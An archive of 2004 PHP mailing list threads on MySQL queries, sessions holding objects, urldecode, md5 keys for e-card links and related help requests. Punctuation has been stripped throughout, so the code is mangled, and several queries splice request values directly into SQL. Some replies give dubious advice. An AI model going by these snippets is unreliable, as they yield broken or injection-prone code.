[PHP] Re: Close all open tags in HTML text
Matt Palermo wrote: I am allowing users to imput HTML code into a textarea. After they input this, I wany to output their HTML to the browser. In order for the document to be safe, I need to close all open HTML tags that have been left open by the user, along with any open comments. Is there a way to take an HTML string and add closing tags and comments to it if needed? Thanks, Matt I would use a regular expression to grab the valid opening and closing HTML tags, and use something á la htmlentities() on the rest of the document. -- Daniel Schierbeck Help spread Firefox (www.getfirefox.com): http://www.spreadfirefox.com/?q=user/registerr=6584 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] MYSQL Query question
Table chat_online:
session (varchar)
activity (datetime)
Table persons
persons_region_int(int)
Table regions
region_id
region_name
On a page i list all persons which are in the chat_online dbase and
within a certain period:
$limit_time = time() - 130; // 2 Minutes time out. 60 * 2 = 120
$sqlchatonline = SELECT * FROM chat_online WHERE
UNIX_TIMESTAMP(activity) = $limit_time AND
(sessionid!='.session_id().');
$resultchatonline=mysql_query($sqlchatonline) or die (mysql_error());
$chatvisits = mysql_num_rows($resultchatonline);
while($rowchatonline = mysql_fetch_object($resultchatonline)){
$chattersessionid=$rowchatonline-sessionid;
//get the username, userid, mainpicid from the online chatter
$getinfo= select * from persons where
person_session_id='$chattersessionid';
$resultgetinfo = mysql_query($getinfo) or die (mysql_error());
$rowgetinfo= mysql_fetch_array($resultgetinfo);
echo $rowgetinfo['person_nick'];
}
Now i want these online chatters to be listed by person_region_int:
something like:
region A
chatter1
chatter2
region B
none
region C
chatter3
chatter4
How do i do this?
And a second question:
I have created a menu box which lists all regions, if a option is
selected by the user, i only want to show the online chatters of the
selected region (selecting an option defines a variable $region which
holds the region_id)
Something like:
if ($region) {
$sqlchatonline = SELECT * FROM chat_online, persons WHERE
UNIX_TIMESTAMP(chat_online.activity) = $limit_time AND
(chat_online.sessionid!='.session_id().' AND
(persons.persons_region_int='$region');
}
This doe not give me the correct result: it shows all online chatters *
total amount of users of that region. It should be all online chatters
from that specified region
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache whens earching something. Does someone know a good
mysql manual site or a good mysql book?
Thx in advance
Reinhart
_
Reinhart Viane
mailto:[EMAIL PROTECTED] [EMAIL PROTECTED]
Domos || D-Studio
Graaf Van Egmontstraat 15/3 -- B 2800 Mechelen -- tel +32 15 44 89 01 --
fax +32 15 43 25 26
STRICTLY PERSONAL AND CONFIDENTIAL
This message may contain confidential and proprietary material for the
sole use of the intended
recipient. Any review or distribution by others is strictly prohibited.
If you are not the intended
recipient please contact the sender and delete all copies.
Re: [PHP] ini_set doesn't work
your set it to '-1'!!! thats not allowed. You must habe a value highter than zero. Its better you set it in generall to 60. And you forgot the 'M' fater the number like ini_set(memory_limit,-1M); set it better to that: ini_set(memory_limit,60M); hello, what do I have to change in php.ini, to allow thr ini_set(memory_limit,-1); command? It doesn't work in my script... regards Joerg -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Need shipping info
Hi guys... Here I'm using a UPS service Could any one tell what sort details we have to consider in the database while shipping the products to the shipment gateway thanks regards, Suneel
[PHP] PHP4 mysqli with mysql 4.1.7?
Hi, This message is a bit long, but I hope somebody could help me on this issue, thank you . I am using mysql 4.1.0(default-character-set=utf8) with PHP 4.3.3. All tables are using utf8 charset. I can insert, select and display the utf8 character without any problem using PHP, I used the normal mysql_query operation, NOT mysqli. Yes, msqyl_query works well in 4.1.0. Now, I upgraded to 4.1.7(default-character-set=utf8). I use mysql client and I can see all data in 4.1.7 are utf8. However, PHP shows all as ???. SHOW VARIABLES LIKE '%charset%' character_set_server utf8 character_set_system utf8 character_set_database utf8 character_set_client utf8 character_set_connection utf8 character_set_results utf8 collation_connection utf8_general_ci collation_database utf8_general_ci collation_server utf8_general_ci I struggled for a few days and finally discovered a message in mysql-lists by Marek Lewczuk(UTF-8 problem, 24/5/2004), he has the follwing in his PHP script: mysqli_query($c, SET CHARACTER SET utf8;); mysqli_query($c, SELECT * FROM db); I have never used mysqli before, and I found it is only avaliable in PHP5. I have several questions to ask: 1. Can I compile PHP4 with mysqli extention? Is there any tricks to do this? 2. Why mysql 4.1 + mysqli is recommended? But not the normal mysql extention? 3. If I upgrade to mysql 4.1.7 + PHP5, I need to rewrite all of my application to use mysqli instead of mysql? Any advise on this issue? 4. I see that we must use mysqli_query($c, SET CHARACTER SET utf8;); before any query, can I compile the mysqli extention to use utf8 as default? 5. In http://www.php.net/manual/en/ref.mysql.php I see a note: If you need charsets other than latin (default), you have to install external (not bundled) libmysql with compiled charset support. So, it means it is possible to use mysql_query to with utf8? 6. Any reason why I can use mysql_query with 4.1.0 without any problem? I know there are many questions, but I hope somebody could help me. And I believes there are lots of people having the same upgrade issue. if utf8 + 4.1.7 + mysqli_query is a must instead of 4.1.7 + mysql_query, I am sure that there will be lots of problem come up as most PHP applications are using mysql_query only. THANK YOU VERY MUCH!!! Francis Mak
[PHP] Objects and sessions
Following code:
?php
class SessionTestC {
protected $value;
function __construct ( $val ) {
$this-value = $val;
}
function GetValue () {
return $this-value;
}
}
if ( isset ($_SESSION['TestObj'])) {
echo 'Session Test is set to: '.$_SESSION['TestObj']-GetValue().'br';
} else {
session_start ();
echo 'Session Test was not set.br';
$_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
echo a href='.basename($_SERVER['PHP_SELF']).'Click here./abr;
}
?
Gives me an error of incomplete object on second access, like this:
*Fatal error*: main() [function.main
http://localhost/sfcms/Scripts/function.main]: The script tried to
execute a method or access a property of an incomplete object. Please
ensure that the class definition SessionTestC of the object you are
trying to operate on was loaded _before_ unserialize() gets called or
provide a __autoload() function to load the class definition in
*/home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php* on line *16
*But as it can be seen, the class is defined in the script
SessionTest.php itself, so... ??
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: mail with attachment
I did not try it yet .. but I will Manuel Lemos [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] Hello, Dre wrote: Thanks Manuel, I will check the class and here is the code of the mail sending script //== ?php $att_name = $_POST['att']; echo $att_name; $att_size = filesize($att_name); $handle= fopen($att_name, r); $file = fread($handle, $att_size); You need to open the file as binary but I do not think that could cause the problem that you described. Did you try the class that I mentioned? Did it work? -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Close all open tags in HTML text
On Wed, 8 Dec 2004 22:33:19 -0500, Matt Palermo [EMAIL PROTECTED] wrote: I am allowing users to imput HTML code into a textarea. After they input this, I wany to output their HTML to the browser. In order for the document to be safe, I need to close all open HTML tags that have been left open by the user, along with any open comments. Is there a way to take an HTML string and add closing tags and comments to it if needed? You might want to look at the html tidy functions for tidying and repairing html: http://www.php.net/manual/en/ref.tidy.php -robin -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Question: urldecode
In my search page, the url returned comes back with
the ..err I forget what it's called, but query string
looks like this: %5B%5D=3. I think the %5B and 5D
should be [].
What I think is needed is rawurldecode. I've looked
through my code and think it belongs somewhere in this
block:
$queryString_rsVJ = ;
if (!empty($_SERVER['QUERY_STRING'])) {
$params = explode(, $_SERVER['QUERY_STRING']);
$newParams = array();
foreach ($params as $param) {
if (stristr($param, pageNum_rsVJ) == false
stristr($param, totalRows_rsVJ) == false) {
array_push($newParams, $param);
}
}
if (count($newParams) != 0) {
$queryString_rsVJ = .
htmlentities(implode(, $newParams));
}
}
would doing something like this make sense?:
$queryString_rsVJ = .
htmlentities(rawurldecode(implode(, $newParams)));
Feedback appreciated.
Thank you
Stuart
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] duplicate md5 hash's
Hello Guy, Thursday, December 9, 2004, 11:39:27 AM, you wrote: GB $hash = md5(uniqid($message)); GB where message is a string that the user will input. GB How likely is it that this hash might be repeated? GB I'm using the hash as a primary key in a database - the user gets sent GB the hash as part of a url to retrieve the details of that database row. GB (its a basic send to a friend e-card system). GB Is there any way that the same hash could have been generated more than GB once? It's extremely unlikely (I cannot give you any stats as to how unlikely though, sorry). However why not just stick the $hash creation into a self-checking loop. I.e. make the hash - check the database - does it exist already? - If not then the hash is good, else repeat the process. Using uniqid will give you a unique hash on each occasion so this process shouldn't take very long at all even if it did find a duplicate a few times (unlikely!) Best regards, Richard Davey -- http://www.launchcode.co.uk - PHP Development Services I am not young enough to know everything. - Oscar Wilde -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] [SOLUTION] Re: [PHP] Objects and sessions
Thomas Munz wrote:
I think, its not possible to init an Objeect on a session.
Yes, it can.
The problem was with serialization. With session.auto_start set to 1 on
php.ini, seems like session's objects are unserialized before loading
the script, so the class is not loaded when the session unserialized the
object, and therefore it fails to unserialize it as an instance of its
class.
Setting session.auto_start to 0 on php.ini you should take care of
resume sessions calling session_start() each time, but you can put that
call after class definition, so the object will be unserialized after,
so the problem is solved.
This code works fine:
?php
class SessionTestC {
protected $value;
function __construct ( $val ) {
$this-value = $val;
}
function GetValue () {
return $this-value;
}
}
if ( isset ($_GET['close_session'])) {
unset ($_SESSION);
session_start ();
session_destroy ();
}
session_start ();
if ( isset ($_SESSION['TestObj'])) {
echo 'TestObj is an instance of
'.get_class($_SESSION['TestObj']).'br';
echo 'pre';
print_r ($SESSION['TestObj']);
echo '/pre';
echo a
href='.basename($_SERVER['PHP_SELF']).?close_session=1'Close
session./abr;
echo 'Session Test is set to: '.$_SESSION['TestObj']-GetValue().'br';
} else {
echo 'Session Test was not set.br';
$_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
echo a href='.basename($_SERVER['PHP_SELF']).'Click here./abr;
}
?
BTW, I do not know if the code I've used to destroy the session is the
best, but this is a secondary issue...
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] allow_url_fopen ini directive not enough
Hi, I would like to see a new directive to go alongside allow_url_fopen to allow people to turn on or off the ability to include/require a remote file. The ability to include and execute a file as php from a remote host leaves many applications open to cross-site-scripting attacks. This would be easily avoidable if we had a directive (allow_url_include?) that by default removed this capability. Any thoughts? Kelvin -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] duplicate md5 hash's
Hi, I know this is highly unlikely... but I have this code: $hash = md5(uniqid($message)); where message is a string that the user will input. How likely is it that this hash might be repeated? I'm using the hash as a primary key in a database - the user gets sent the hash as part of a url to retrieve the details of that database row. (its a basic send to a friend e-card system). Is there any way that the same hash could have been generated more than once? Cheers, Guy -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] duplicate md5 hash's
Thanks for the tip... I have now implemented a while loop to make sure that it goes into the db, as you say this should never actually loop, but if it does it should only loop once.. kind of extra security.. cheers Richard Davey wrote: Hello Guy, Thursday, December 9, 2004, 11:39:27 AM, you wrote: GB $hash = md5(uniqid($message)); GB where message is a string that the user will input. GB How likely is it that this hash might be repeated? GB I'm using the hash as a primary key in a database - the user gets sent GB the hash as part of a url to retrieve the details of that database row. GB (its a basic send to a friend e-card system). GB Is there any way that the same hash could have been generated more than GB once? It's extremely unlikely (I cannot give you any stats as to how unlikely though, sorry). However why not just stick the $hash creation into a self-checking loop. I.e. make the hash - check the database - does it exist already? - If not then the hash is good, else repeat the process. Using uniqid will give you a unique hash on each occasion so this process shouldn't take very long at all even if it did find a duplicate a few times (unlikely!) Best regards, Richard Davey -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Objects and sessions
I think, its not possible to init an Objeect on a session. Session will be
rebuild on each reload of the site based on the session id, i think...
Maybe here the object can't be rebuild anymore...
Following code:
?php
class SessionTestC {
protected $value;
function __construct ( $val ) {
$this-value = $val;
}
function GetValue () {
return $this-value;
}
}
if ( isset ($_SESSION['TestObj'])) {
echo 'Session Test is set to:
'.$_SESSION['TestObj']-GetValue().'br'; } else {
session_start ();
echo 'Session Test was not set.br';
$_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
echo a href='.basename($_SERVER['PHP_SELF']).'Click
here./abr; }
?
Gives me an error of incomplete object on second access, like this:
*Fatal error*: main() [function.main
http://localhost/sfcms/Scripts/function.main]: The script tried to
execute a method or access a property of an incomplete object. Please
ensure that the class definition SessionTestC of the object you are
trying to operate on was loaded _before_ unserialize() gets called or
provide a __autoload() function to load the class definition in
*/home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php* on line *16
*But as it can be seen, the class is defined in the script
SessionTest.php itself, so... ??
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] best practice question..
On this note - what is considered best practice in a - sent to friend type thing. i.e. User inputs their name + message + email + friends email into a html/flash form friend gets a link to read the message. currently I do this: 1 collect form input 2 create hash using the md5/uniqid method : $hash = md5(uniqid($key)); 3 input data to database table using the hash as the primary key value 4 send email to friend with link containing the hash 5 user clicks on link 6 hash read in from the $_GET object 7 hash used to select message details from DB and displayed to the user There's never a security issue here - i.e. i don't mind how many times / who reads the message, but just want to make it hard to just guess keys to read other messages (otherwise it would just be the db id) This method works for me, but is it the *right* way? Thanks for any input Cheers, Guy -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Need shipping info
suneel wrote: Hi guys... Here I'm using a UPS service Could any one tell what sort details we have to consider in the database while shipping the products to the shipment gateway thanks regards, Suneel You might want to consider asking a php question. muttering adds UPS to the list of things covered by the php-general list /muttering -- By-Tor.com ...it's all about the Rush http://www.by-tor.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] best practice question..
Hello Guy, Thursday, December 9, 2004, 12:34:03 PM, you wrote: GB There's never a security issue here - i.e. i don't mind how many times / GB who reads the message, but just want to make it hard to just guess keys GB to read other messages (otherwise it would just be the db id) GB This method works for me, but is it the *right* way? There's no right or wrong way to do this - if it works for you, then it works :) The only thing I would strongly suggest is a check somewhere - if the recipient has been sent an email already (perhaps within the last 30 days?) then you don't send them another one. That way you're not open to being a spam bot. Best regards, Richard Davey -- http://www.launchcode.co.uk - PHP Development Services I am not young enough to know everything. - Oscar Wilde -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Question: urldecode
To view the terms under which this email is distributed, please go to http://disclaimer.leedsmet.ac.uk/email.htm -Original Message- From: Stuart Felenstein [mailto:[EMAIL PROTECTED] Sent: 09 December 2004 11:52 In my search page, the url returned comes back with the ..err I forget what it's called, but query string looks like this: %5B%5D=3. I think the %5B and 5D should be []. Are you seeing the URL-encoded version *only* in your browser's Address/Location bar? If so, that's perfectly normal and nothing to worry about -- it should be automatically decoded by the Web server before being passed to PHP. If you're seeing the encoded version actually in your PHP script, that sounds like a major problem, possibly indicating a missing urldecode() or extraneous urlencode() -- in which case, please post a more detailed analysis of your problem, examples of the unwanted behaviour, and the relevant portions of script. Cheers! Mike - Mike Ford, Electronic Information Services Adviser, Learning Support Services, Learning Information Services, JG125, James Graham Building, Leeds Metropolitan University, Headingley Campus, LEEDS, LS6 3QS, United Kingdom Email: [EMAIL PROTECTED] Tel: +44 113 283 2600 extn 4730 Fax: +44 113 283 3211 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] MYSQL Query question
Reinhart Viane wrote: And a last question: I always seem to get stuck on mysql queries when scripting. mysql.com gives me a headache whens earching something. Does someone know a good mysql manual site or a good mysql book? That does not mean mysql questions should be posted on php mailing lists. STRICTLY PERSONAL AND CONFIDENTIAL This message may contain confidential and proprietary material for the sole use of the intended recipient. Any review or distribution by others is strictly prohibited. If you are not the intended recipient please contact the sender and delete all copies. Do you know that mailing lists are automatically archived at thousands of websites? -- Raditha Dissanayake. -- http://www.radinks.com/print/card-designer/ | Card Designer Applet http://www.radinks.com/upload/ | Drag and Drop Upload -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] MYSQL Query question
First, since it was a combined question of php and mysql I thought of sending it here. Secondly, this is my standard footer. My appologizes if my question irritates you -Original Message- From: Raditha Dissanayake [mailto:[EMAIL PROTECTED] Sent: donderdag 9 december 2004 14:14 To: [EMAIL PROTECTED] Subject: Re: [PHP] MYSQL Query question Reinhart Viane wrote: And a last question: I always seem to get stuck on mysql queries when scripting. mysql.com gives me a headache whens earching something. Does someone know a good mysql manual site or a good mysql book? That does not mean mysql questions should be posted on php mailing lists. STRICTLY PERSONAL AND CONFIDENTIAL This message may contain confidential and proprietary material for the sole use of the intended recipient. Any review or distribution by others is strictly prohibited. If you are not the intended recipient please contact the sender and delete all copies. Do you know that mailing lists are automatically archived at thousands of websites? -- Raditha Dissanayake. -- http://www.radinks.com/print/card-designer/ | Card Designer Applet http://www.radinks.com/upload/ | Drag and Drop Upload -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Question: urldecode
--- Ford, Mike [EMAIL PROTECTED] wrote: Are you seeing the URL-encoded version *only* in your browser's Address/Location bar? If so, that's perfectly normal and nothing to worry about -- it should be automatically decoded by the Web server before being passed to PHP. If you're seeing the encoded version actually in your PHP script, that sounds like a major problem, possibly indicating a missing urldecode() or extraneous urlencode() -- in which case, please post a more detailed analysis of your problem, examples of the unwanted behaviour, and the relevant portions of script. I have no idea about what it means to see the encoded version in my script. I have only one urldecode in the script: a href=SearchJobDetails.php?JobID=?php echo urldecode($row_rsVJ['JobID']);? No urlencodes anywhere. I'll assume it's decoded properly before going to php because the script runs fine. I just know that I've seen the hex's normally converted in the browser bar. Further, I was assuming I should add the urldecode to the query string. As I had posted originally. From the example in the manual it appears I might to pass the params through a urldecode counter loop. Lastly, I wasn't concerned about the hex code, but I just made some reconnections of scripts. Users can save their search parameters. I am saving the query string. Now I had this set up before and the way it was working , is when the user wanted to view or edit their saved searches, the search page would come back with all the parameters filled in including shaded parameters in things like mult select lists and menu dropdowns. It's not working that way now , so my first suspicion is perhaps the hex is effecting it. I can post more of the script if that makes sense. Stuart -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Objects and sessions
Hi, your code my be this , you must use session_start() first:
?php
session_start ();
class SessionTestC {
protected $value;
function __construct ( $val ) {
$this-value = $val;
}
function GetValue () {
return $this-value;
}
}
if ( isset ($_SESSION['TestObj'])) {
echo 'Session Test is set to: '.$_SESSION['TestObj']-GetValue().'br';
} else {
echo 'Session Test was not set.br';
$_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
echo a href='.basename($_SERVER['PHP_SELF']).'Click here./abr;
}
?
Francisco M. Marzoa Alonso wrote:
Following code:
?php
class SessionTestC {
protected $value;
function __construct ( $val ) {
$this-value = $val;
}
function GetValue () {
return $this-value;
}
}
if ( isset ($_SESSION['TestObj'])) {
echo 'Session Test is set to: '.$_SESSION['TestObj']-GetValue().'br';
} else {
session_start ();
echo 'Session Test was not set.br';
$_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
echo a href='.basename($_SERVER['PHP_SELF']).'Click here./abr;
}
?
Gives me an error of incomplete object on second access, like this:
*Fatal error*: main() [function.main
http://localhost/sfcms/Scripts/function.main]: The script tried to
execute a method or access a property of an incomplete object. Please
ensure that the class definition SessionTestC of the object you are
trying to operate on was loaded _before_ unserialize() gets called or
provide a __autoload() function to load the class definition in
*/home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php* on line *16
*But as it can be seen, the class is defined in the script
SessionTest.php itself, so... ??
--
-- ShenKong ([EMAIL PROTECTED])
-- http://www.openphp.cn
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] a question about the PHP manual
Hello, As I'm studying, and learning, PHP, I use certain resources again and again. A few books I've bought, some web sites, this mailing list, and the PHP manual. I've taken the often repeated 'RTFM' to heart, and I attempt to google or RTFM before considering a post to the list with a question, but now I have a question about the manual itself. I've noticed that most of the replies to the questions on this list, when they refer to a part of the manual, point to the same few sections over and over. Such as arrays, strings, sessions, objects, and a few others. My question is this, when I'm reading the manual, is just that I should be concentrating on a few sections (and if so, which?), or should I be giving equal attention to all the sections, including some (I suppose) I might never use. Thoughts? thanks, William -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Installing Apache and PHP from scratch
Hi, Have been using RedHat and Fedora Systems. When I install the OS, Apache is usually installed already and I download PHP and install manually. I'd like to install Apache itself but not sure what configuration to use. Is there a command similar to the phpinfo() command that can tell me how an already installed Apache in configured? Enable server-info in your httpd.conf and be amazed at the amount of information http;//localhost/server-info will chuck at you. How exactly does this work? 1. In my httpd.,conf file i uncommented teh following lines: Location /server-info SetHandler server-info Order deny,allow Deny from all Allow from .lclnav.com /Location 2. I then restarted my apache server 3. I then type in the location bar: HYPERLINK http://www.lclnav.com/server-infohttp://www.lclnav.com/server-info I get (doesn't work): Forbidden You don't have permission to access /server-info on this server. Note: I created the directory 'server-info' off of the directory root after the error; still errors --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.807 / Virus Database: 549 - Release Date: 12/7/2004 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Question: urldecode
To view the terms under which this email is distributed, please go to http://disclaimer.leedsmet.ac.uk/email.htm -Original Message- From: Stuart Felenstein [mailto:[EMAIL PROTECTED] Sent: 09 December 2004 13:38 --- Ford, Mike [EMAIL PROTECTED] wrote: Are you seeing the URL-encoded version *only* in your browser's Address/Location bar? If so, that's perfectly normal and nothing to worry about -- it should be automatically decoded by the Web server before being passed to PHP. If you're seeing the encoded version actually in your PHP script, that sounds like a major problem, possibly indicating a missing urldecode() or extraneous urlencode() -- in which case, please post a more detailed analysis of your problem, examples of the unwanted behaviour, and the relevant portions of script. I have no idea about what it means to see the encoded version in my script. I have only one urldecode in the script: a href=SearchJobDetails.php?JobID=?php echo urldecode($row_rsVJ['JobID']);? I actually doubt whether you even need this urldecode() -- but it depends where that value is coming from. Further, I was assuming I should add the urldecode to the query string. I don't quite understand this -- if you mean the query string supplied to your script and manifesting in your $_GET array, then no, very unlikely, since this should have been taken care of by the Web server before it gets anywhere near PHP. If you're referring to echoing out URLs with query strings on them, then that is one of the few instances where urlENcode() might be necessary, but definitely not urlDEcode(). Lastly, I wasn't concerned about the hex code, but I just made some reconnections of scripts. Users can save their search parameters. I am saving the query string. Now I had this set up before and the way it was working , is when the user wanted to view or edit their saved searches, the search page would come back with all the parameters filled in including shaded parameters in things like mult select lists and menu dropdowns. It's not working that way now , so my first suspicion is perhaps the hex is effecting it. All I can say to this is to re-iterate the point that your Web server should be decoding those %xx values before your script ever gets to see them. You *may* have to urlencode() values you write out that might one day form part of a clickable link -- but, because of the previous sentence, you should not yourself need to do the compensating urldecode() in the target script. Once again, this sounds like a situation where you need to be echoing out everything and anything of even the slightest relevance at the crucial spots of your script -- in the debugging phase, my scripts often have a bunch of debugging echoes every few lines, and some sections even end up with more temporary echoes than actual script! It's tedious wading your way through the screenfuls of output, but can be exceedingly illuminating of an elusive problem. Cheers! Mike - Mike Ford, Electronic Information Services Adviser, Learning Support Services, Learning Information Services, JG125, James Graham Building, Leeds Metropolitan University, Headingley Campus, LEEDS, LS6 3QS, United Kingdom Email: [EMAIL PROTECTED] Tel: +44 113 283 2600 extn 4730 Fax: +44 113 283 3211 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] MYSQL Query question
Raditha Dissanayake wrote: Reinhart Viane wrote: And a last question: I always seem to get stuck on mysql queries when scripting. mysql.com gives me a headache whens earching something. Does someone know a good mysql manual site or a good mysql book? That does not mean mysql questions should be posted on php mailing lists. snip There you go again, trying to keep this list on topic. ;) -- John C. Nichel ÜberGeek KegWorks.com 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Installing Apache and PHP from scratch
On Thursday 09 December 2004 22:12, Don wrote: 1. In my httpd.,conf file i uncommented teh following lines: Location /server-info SetHandler server-info Order deny,allow Deny from all Allow from .lclnav.com /Location That Allow from ... has to specify an IP address / network range / domain (etc) that will allow your *client* to connect. If you have shell access on the server and you have lynx/links/elinks installed then you should probably only Allow from 127.0.0.1 and just access it directly from the server rather than through a remote client. Note: I created the directory 'server-info' off of the directory root after the error; still errors You don't need to create any directories for the above to work. As this is not PHP-related if you need more info refer to the Apache docs and/or ask on the Apache mailing list. -- Jason Wong - Gremlins Associates - www.gremlins.biz Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * -- Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general -- /* BOFH Excuse #116: the real ttys became pseudo ttys and vice-versa. */ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] a question about the PHP manual
At 09:56 AM 12/9/2004, Eakin, W wrote: Hello, As I'm studying, and learning, PHP, I use certain resources again and again. A few books I've bought, some web sites, this mailing list, and the PHP manual. I've taken the often repeated 'RTFM' to heart, and I attempt to google or RTFM before considering a post to the list with a question, but now I have a question about the manual itself. I've noticed that most of the replies to the questions on this list, when they refer to a part of the manual, point to the same few sections over and over. Such as arrays, strings, sessions, objects, and a few others. My question is this, when I'm reading the manual, is just that I should be concentrating on a few sections (and if so, which?), or should I be giving equal attention to all the sections, including some (I suppose) I might never use. Thoughts? thanks, William Well, those are commonly used parts of the language, along with control structures (IF, WHILE, CASE). Once PHP is installed, familiarity with Chapters 10 through 42 would furnish a really solid grounding. Then I'd look at the function list and focus on the functions applicable to your particular database and the error handling and logging functions. After that, it depends on your programming experience, as how one thinks in language a may be subtly different language b. Note that there are both directory and file system functions; the separation is logical, but sent me on a worried hunt a couple of years ago. Thus we reach the land of it depends on what you want or have to do. In closing, I'd recommend writing little test scripts so that you can do two things: 1. Figure out how to use the various functions and how they behave. 2. Then intentionally break them - knowledge of this behaviour can be just as important. Alternately, like many, dig out the info as it's needed. The problem with this approach is missing out on new and better ways of doing things, and you don't enrich your toolkit. As for some (I suppose) I might never use - just how much time do you WANT to spend with your computer? How do the others in your life feel about that? Cheers - Miles -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] a question about the PHP manualB
At 09:56 AM 12/9/2004, Eakin, W wrote: Hello, As I'm studying, and learning, PHP, I use certain resources again and again. A few books I've bought, some web sites, this mailing list, and the PHP manual. I've taken the often repeated 'RTFM' to heart, and I attempt to google or RTFM before considering a post to the list with a question, but now I have a question about the manual itself. I've noticed that most of the replies to the questions on this list, when they refer to a part of the manual, point to the same few sections over and over. Such as arrays, strings, sessions, objects, and a few others. My question is this, when I'm reading the manual, is just that I should be concentrating on a few sections (and if so, which?), or should I be giving equal attention to all the sections, including some (I suppose) I might never use. I have found that when learning a new language that it is a good idea to read the whole manual it time permits, even it there are sections that you don't think you will ever need. Later on when programming you may need to do something and remember that function that you never thought you would need. It never hurts to no what's available even if you don't think you will need it. Ron Clark System Administrator Armstrong Atlantic State University -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] a question about the PHP manual
On Thursday 09 December 2004 1:56 pm, Eakin, W wrote: I've noticed that most of the replies to the questions on this list, when they refer to a part of the manual, point to the same few sections over and over. Such as arrays, strings, sessions, objects, and a few others. My question is this, when I'm reading the manual, is just that I should be concentrating on a few sections (and if so, which?), or should I be giving equal attention to all the sections, including some (I suppose) I might never use. Here's a suggestion... Go through Section III on Language Reference thoroughly. You'll need to understand pretty much all of this. Skim though sections IV and V (Security and Features) so you know what's there and come back to them before you use PHP in a real application (specially the Security section!) In the function reference, look in detail at the following sections: - Array functions - Date and Time functions - Directory Functions - Filesystem functions - String Functions - Variable Functions - plus the specific section for the database you want to use The above are all pretty common requirements in most PHP applications. Then skim though the following sections and come back to them when you need to use them: - Error Handling and Logging Functions - HTTP Functions - Miscellaneous Functions - Network Functions - Regular Expression Functions Then dig into the other sections in the function reference that interest you. My 2p - Nick -- Nick Talbott, Powys County Council, UK IT Policy and Strategy Manager/Rheolwr Polisi a Chynllunio TGCh email: [EMAIL PROTECTED] fax: 01597 824781 web: www.powys.gov.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Question:maybe urldecode
